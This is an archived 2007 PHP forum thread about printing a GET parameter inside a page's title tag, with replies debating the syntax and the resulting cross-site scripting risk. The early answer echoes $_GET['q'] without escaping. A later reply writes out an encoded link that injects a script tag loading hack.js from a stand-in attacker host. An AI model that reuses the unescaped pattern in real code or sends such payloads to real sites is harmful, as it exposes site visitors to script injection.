ze1d Posted December 8, 2007 Share Posted December 8, 2007 Hi all, I'm new to PHP and still learning,I'm try to send an argument from one page to another using a form (in the first page and using the GET method).Now in the second page I'm trying to make the sent value as a title of the page like this:<title><?php $_GET["q"];?></title>But this isn't working..Can someone help me please :)zeid Link to comment Share on other sites More sharing options...
Ingolme Posted December 8, 2007 Share Posted December 8, 2007 <?php echo $_GET["q"];?> Link to comment Share on other sites More sharing options...
ze1d Posted December 8, 2007 Author Share Posted December 8, 2007 Thank you very much! Link to comment Share on other sites More sharing options...
clonetrooper9494 Posted December 9, 2007 Share Posted December 9, 2007 also, you need to say <?phpecho "<title>" . $_GET['q'] . "</title>"?>or else your title would be: "<?php echo $_GET['q'] ?> - Internet Broswer" Link to comment Share on other sites More sharing options...
boen_robot Posted December 9, 2007 Share Posted December 9, 2007 also, you need to say <?phpecho "<title>" . $_GET['q'] . "</title>"?>or else your title would be: "<?php echo $_GET['q'] ?> - Internet Broswer"Bull$hit!PHP staments can be embed anywhere within HTML (or other document types for that matter).<title><?php echo $_GET["q"];?></title> Is a perfectly fine structure of a PHP file. Try it yourself if you don't believe me. Link to comment Share on other sites More sharing options...
Synook Posted December 10, 2007 Share Posted December 10, 2007 Even <ti<?php echo "tle>{$_GET['q']}</ti"; ?>tle> Would be fine (though don't know why you would write it that way...) Link to comment Share on other sites More sharing options...
Anders Moen Posted December 10, 2007 Share Posted December 10, 2007 Well, if you use that, we can do stuff to your site like...stuff lolYou should just put on this instead:<?php echo htmlentities(stripslashes($_GET['q'])); ?>If you don't, we can for example in your URI write this:?q=<a href="http://www.somesite.com">Text</a>That would display like a link to somesite.com. Not good Link to comment Share on other sites More sharing options...
justsomeguy Posted December 10, 2007 Share Posted December 10, 2007 That wouldn't do anything. You can't put a link inside <title> tags. You might be able to add a Javascript file and then send someone a link to the page but the link is going to look suspicious and the cross-site attack is of limited significance anyway. Would you click on this link? http://www.site.com/?q=title%3C%2Ftitle%3E%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22http%3A%2F%2Fwww.hax.com%2Fhack.js%22%3E%3C%2Fscript%3E%3Ctitle%3E Link to comment Share on other sites More sharing options...
Anders Moen Posted December 10, 2007 Share Posted December 10, 2007 Yes, I know, but it was an examplewe don't know if he will use it in his document or anything later, you know Link to comment Share on other sites More sharing options...
Synook Posted December 10, 2007 Share Posted December 10, 2007 Well remember the "sammy is my hero" MySpace exploit?http://www.google.com.au/search?q=Sammy+is...lient=firefox-aBut I suppose that needed the JavaScript to be persistent... Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.